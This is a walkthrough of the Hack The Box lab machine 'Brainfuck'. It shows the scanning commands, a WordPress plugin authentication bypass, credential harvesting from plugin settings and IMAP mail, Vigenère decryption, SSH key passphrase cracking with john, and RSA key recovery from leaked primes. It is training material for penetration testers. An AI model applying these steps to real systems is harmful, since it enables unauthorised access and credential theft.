Difficulty Rating:

Machine: Brainfuck
OS: Linux
IP: 10.10.10.17

  • Nmap TCP scan
$ nmap -A -sV -Pn  10.10.10.17 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-01 21:17 IST
Nmap scan report for 10.10.10.17
Host is up (0.19s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (EdDSA)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) PIPELINING AUTH-RESP-CODE RESP-CODES UIDL USER TOP CAPA
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: IMAP4rev1 OK LOGIN-REFERRALS LITERAL+ more ID post-login have IDLE listed Pre-login SASL-IR AUTH=PLAINA0001 ENABLE capabilities
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.55 seconds
  • Dirb for https://brainfuck.htb
$ dirb https://brainfuck.htb -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Aug  2 22:22:39 2017
URL_BASE: https://brainfuck.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://brainfuck.htb/ ----
+ https://brainfuck.htb/index.php (CODE:301|SIZE:0)                                                                      
+ https://brainfuck.htb/wp-blog-header.php (CODE:200|SIZE:0)                                                        
+ https://brainfuck.htb/wp-config.php (CODE:200|SIZE:0)                                                                  
+ https://brainfuck.htb/wp-cron.php (CODE:200|SIZE:0)                                                                       
+ https://brainfuck.htb/wp-links-opml.php (CODE:200|SIZE:224)                                                            
+ https://brainfuck.htb/wp-load.php (CODE:200|SIZE:0)                                                                        
+ https://brainfuck.htb/wp-login.php (CODE:200|SIZE:2244)                                                             
+ https://brainfuck.htb/wp-mail.php (CODE:403|SIZE:3444)                                                                            
+ https://brainfuck.htb/wp-settings.php (CODE:500|SIZE:0)                                                           
+ https://brainfuck.htb/wp-signup.php (CODE:302|SIZE:0)                                                                  
+ https://brainfuck.htb/wp-trackback.php (CODE:200|SIZE:135)                                                                
+ https://brainfuck.htb/xmlrpc.php (CODE:405|SIZE:42)                                                                                
                                                                                                                                                                                             
-----------------
END_TIME: Wed Aug  2 22:43:08 2017
DOWNLOADED: 4612 - FOUND: 12
  • Wpscan
$ sudo wpscan -u https://brainfuck.htb --disable-tls-checks -e --log brainfuck_wpscan.txt
  • Nikto
$ nikto -h https://brainfuck.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.17
+ Target Hostname:    brainfuck.htb
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/[email protected]
+ Start Time:         2017-08-02 22:53:37 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <https://brainfuck.htb/?rest_route=/>; rel="https://api.w.org/"
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, fields: 0x58ef50da 0x264 
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7446 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-08-03 00:39:04 (GMT5.5) (6327 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • Use the following exploit to log in as admin: change "administrator" to "admin" in the username field and set action="https://brainfuck.htb/wp-admin/admin-ajax.php"
  • Start an Apache server, copy the form into /var/www/html and submit it through the browser.
  • Now go to https://brainfuck.htb/wp-admin and you will be logged in.
  • Visit https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings and get the password by viewing the page source.
  • The password is kHGuERB29DNiNE and the username is orestis
  • Telnet to IMAP server, port 143:
$ telnet 10.10.10.17 143
Trying 10.10.10.17...
Connected to 10.10.10.17.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready.
? LOGIN orestis kHGuERB29DNiNE         
? OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
? LIST "" "*"
* LIST (\HasNoChildren) "/" INBOX
? OK List completed (0.000 + 0.000 secs).
? Select INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 2 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1493461609] UIDs valid
* OK [UIDNEXT 5] Predicted next UID
* OK [HIGHESTMODSEQ 4] Highest
? OK [READ-WRITE] Select completed (0.000 + 0.000 secs).
? FETCH 1 All
* 1 FETCH (FLAGS (\Seen) INTERNALDATE "17-Apr-2017 20:15:40 +0300" RFC822.SIZE 977 ENVELOPE ("Mon, 17 Apr 2017 17:15:40 +0000" "New WordPress Site" (("WordPress" NIL "wordpress" "brainfuck.htb")) (("WordPress" NIL "wordpress" "brainfuck.htb")) (("WordPress" NIL "wordpress" "brainfuck.htb")) ((NIL NIL "orestis" "brainfuck.htb")) NIL NIL NIL "<[email protected]>"))
? OK Fetch completed (0.027 + 0.000 secs).
? FETCH 2 All
* 2 FETCH (FLAGS (\Seen) INTERNALDATE "29-Apr-2017 13:12:06 +0300" RFC822.SIZE 514 ENVELOPE ("Sat, 29 Apr 2017 13:12:06 +0300 (EEST)" "Forum Access Details" (("root" NIL "root" "brainfuck.htb")) (("root" NIL "root" "brainfuck.htb")) (("root" NIL "root" "brainfuck.htb")) ((NIL NIL "orestis" "brainfuck.htb")) NIL NIL NIL "<[email protected]>"))
? OK Fetch completed (0.001 + 0.000 secs).
? FETCH 2 BODY[]
* 2 FETCH (BODY[] {514}
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
	id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <[email protected]>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
)
? OK Fetch completed (0.001 + 0.000 secs).
  • The username for the secret forum is orestis and the password is kIEnnfEKJ#9UmdO

  • Dirsearch

$ ./dirsearch.py -t 500 -u https://sup3rs3cr3t.brainfuck.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e .php

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: .php | Threads: 500 | Wordlist size: 220547

Target: https://sup3rs3cr3t.brainfuck.htb/

[22:20:14] Starting: 
[22:20:20] 500 -    4KB - /login
[22:20:20] 301 -  194B  - /storage  ->  https://sup3rs3cr3t.brainfuck.htb/storage/
[22:20:21] 301 -  194B  - /assets  ->  https://sup3rs3cr3t.brainfuck.htb/assets/
[22:20:21] 301 -  194B  - /uploads  ->  https://sup3rs3cr3t.brainfuck.htb/uploads/
[22:20:21] 301 -  194B  - /scripts  ->  https://sup3rs3cr3t.brainfuck.htb/scripts/
[22:20:22] 200 -    7KB - /
[22:20:41] 301 -  194B  - /vendor  ->  https://sup3rs3cr3t.brainfuck.htb/vendor/
[22:21:12] 200 -    1KB - /LICENSE

Task Completed
  • Go to https://sup3rs3cr3t.brainfuck.htb/d/3-key
  • The messages are encrypted with the Vigenère cipher
  • Visit http://www.dcode.fr/vigenere-cipher to decrypt the messages.
  • Key: FUCKMYBRAIN
  • Path to download key is: https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
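The decryption done above on dcode.fr, as an added Python example that is not part of the original writeup: it decrypts with the key FUCKMYBRAIN given above (the key advances only on letters, so case and punctuation in forum posts survive unchanged) and also shows why the key leaks as soon as a fragment of plaintext is known, since each shift is just ciphertext letter minus plaintext letter. The sample message is constructed from the mail text on this page and encrypted inside the block.

```python
ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
KEY = "FUCKMYBRAIN"  # the key given in the writeup

def vigenere(text, key, decrypt=False):
    """Classic Vigenere over A-Z: non-letters pass through unchanged and do
    not advance the key; the case of each letter is preserved."""
    out, j = [], 0
    for ch in text:
        if not (ch.isascii() and ch.isalpha()):
            out.append(ch)
            continue
        shift = ALPHA.index(key[j % len(key)].upper())
        if decrypt:
            shift = -shift
        base = ord("A") if ch.isupper() else ord("a")
        out.append(chr((ord(ch) - base + shift) % 26 + base))
        j += 1
    return "".join(out)

def recover_key(plaintext, ciphertext):
    """Known-plaintext key recovery: each letter's shift is (c - p) mod 26 and
    the key is the shortest period of that shift stream. Only letters covered
    by the known plaintext contribute, so a fragment shorter than the key
    recovers only a prefix of it."""
    shifts = [(ALPHA.index(c.upper()) - ALPHA.index(p.upper())) % 26
              for p, c in zip(plaintext, ciphertext)
              if p.isascii() and p.isalpha()]
    for period in range(1, len(shifts) + 1):
        if all(shifts[i] == shifts[i % period] for i in range(len(shifts))):
            return "".join(ALPHA[s] for s in shifts[:period])
    return ""

# Constructed sample: the sentence from the mail on this page, encrypted here.
SAMPLE_PT = "Hi there, your credentials for our secret forum are below"
SAMPLE_CT = vigenere(SAMPLE_PT, KEY)

if __name__ == "__main__":
    print(SAMPLE_CT)
    print(vigenere(SAMPLE_CT, KEY, decrypt=True))
    print(recover_key(SAMPLE_PT[:24], SAMPLE_CT[:24]))
```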
  • Download the key and convert it into john's format
    $ ./sshng2john.py id_rsa > rsa2john.txt
    
    Output is in file rsa2john.txt
  • Use john to brute-force the passphrase
    $ /usr/sbin/john rsa2john.txt --wordlist=/usr/share/wordlists/rockyou.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
    Note: This format may emit false positives, so it will keep trying even after
    finding a possible candidate.
    Press 'q' or Ctrl-C to abort, almost any other key for status
    3poulakia!       (id_rsa)
    1g 0:00:00:13 DONE (2017-08-21 17:03) 0.07547g/s 1082Kp/s 1082Kc/s 1082KC/s *7¡Vamos!
    Session completed
    
  • The password is 3poulakia!
  • SSH in with the key, using this password
$ ssh -i id_rsa orestis@10.10.10.17
orestis@brainfuck:~$ ls -la encrypt.sage 
-rw-rw-r-- 1 orestis orestis 580 Apr 29 15:14 encrypt.sage
orestis@brainfuck:~$ nano encrypt.sage 
orestis@brainfuck:~$ ls -la
total 72
drwxr-xr-x 8 orestis orestis  4096 Aug 21 14:49 .
drwxr-xr-x 3 root    root     4096 Apr 13 09:50 ..
-rw------- 1 root    root    11296 Apr 29 15:33 .bash_history
-rw-r--r-- 1 orestis orestis   220 Apr 13 09:50 .bash_logout
-rw-r--r-- 1 orestis orestis  3771 Apr 13 09:50 .bashrc
drwx------ 2 orestis orestis  4096 Apr 29 15:34 .cache
drwxr-xr-x 3 root    root     4096 Apr 17 21:18 .composer
drwxrwxr-x 2 orestis orestis  4096 Aug 21 14:49 .nano
-rw-r--r-- 1 orestis orestis   655 Apr 13 09:50 .profile
drwx------ 8 orestis orestis  4096 Apr 29 15:13 .sage
drwx------ 2 orestis orestis  4096 Apr 17 01:01 .ssh
-rw------- 1 orestis orestis   619 Apr 29 15:14 debug.txt
-rw-rw-r-- 1 orestis orestis   580 Apr 29 15:14 encrypt.sage
drwx------ 3 orestis orestis  4096 Apr 29 13:26 mail
-rw------- 1 orestis orestis   329 Apr 29 15:14 output.txt
-rw------- 1 orestis orestis    33 Apr 29 13:46 user.txt
orestis@brainfuck:~$ cat output.txt 
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
orestis@brainfuck:~$ cat encrypt.sage 
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
  • Execute euclidean_algorithm.py to get the flag
  • The values of p, q and e were obtained from debug.txt
  • The value of ct is obtained from output.txt
$ python euclidean_algorithm.py 
d_hex: 0xc6eccf2d2584044e2173cf0efa88f839ee184df56ce3e6aa450cfcdf9e5ec8b4d8123c2cd57ee4bf7c84e423941191ec57a7944e31327a722143edc1981ecf24bd9b389d673a1bd44288103e501f46994b700ac1abcb15339ff0750566957064605eb9205d159360fb6b907b39ee98683b0f6f418619fcb1665c4c7fa7984e9L
n_dec: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt_dec: 24604052029401386049980296953784287079059245867880966944246662849341507003750
flag
XXXXXXX
User and Root owned!!
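The step the writeup performs with euclidean_algorithm.py (the script itself is not shown on the page), as an added Python example that is not the author's script: it rebuilds d with the extended Euclidean algorithm from the p, q and e that encrypt.sage leaves in debug.txt, reads c from the "Encrypted Password:" line of output.txt and decrypts, which is why writing the private parameters next to the ciphertext defeats the encryption entirely. The primes, e and password below are constructed stand-ins; the real values from the box are not used.

```python
import re
from math import gcd

# Constructed stand-ins for the box's debug.txt (p, q, e on three lines) and
# output.txt. The primes are the Mersenne primes 2^61-1 and 2^89-1 and e is
# fixed, whereas encrypt.sage draws e at random; the recovery is the same.
P, Q, E = 2**61 - 1, 2**89 - 1, 65537
DEBUG_TXT = f"{P}\n{Q}\n{E}\n"

def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        qt, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - qt * x1
        y0, y1 = y1, y0 - qt * y1
    return a, x0, y0

def modinv(e, phi):
    """d = e^-1 mod phi; it exists because encrypt.sage enforced gcd(e, phi) == 1."""
    g, x, _ = egcd(e, phi)
    if g != 1:
        raise ValueError("e is not invertible modulo phi")
    return x % phi

def load_private(debug_txt):
    """Rebuild n and d from the p, q, e that encrypt.sage wrote to debug.txt."""
    p, q, e = (int(line) for line in debug_txt.split())
    return p * q, modinv(e, (p - 1) * (q - 1))

def load_ciphertext(output_txt):
    """Pull c out of the 'Encrypted Password: <c>' line of output.txt."""
    return int(re.search(r"Encrypted Password:\s*(\d+)", output_txt).group(1))

def int_to_text(m):
    """Undo int(password.encode('hex'), 16): big-endian bytes back to text."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode()

def encrypt_like_sage(password, p, q, e):
    """Same operation as encrypt.sage; used here only to build the sample."""
    m = int.from_bytes(password.encode(), "big")
    assert m < p * q and gcd(e, (p - 1) * (q - 1)) == 1
    return f"Encrypted Password: {pow(m, e, p * q)}\n"

def recover(debug_txt, output_txt):
    """What euclidean_algorithm.py does: d from debug.txt, then c^d mod n."""
    n, d = load_private(debug_txt)
    return int_to_text(pow(load_ciphertext(output_txt), d, n))

OUTPUT_TXT = encrypt_like_sage("s3cr3t-root-pw", P, Q, E)  # constructed sample
```

Calling recover(DEBUG_TXT, OUTPUT_TXT) returns the constructed password, the same way the writeup's script turned pt_dec back into the flag.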
Resource for the algorithm
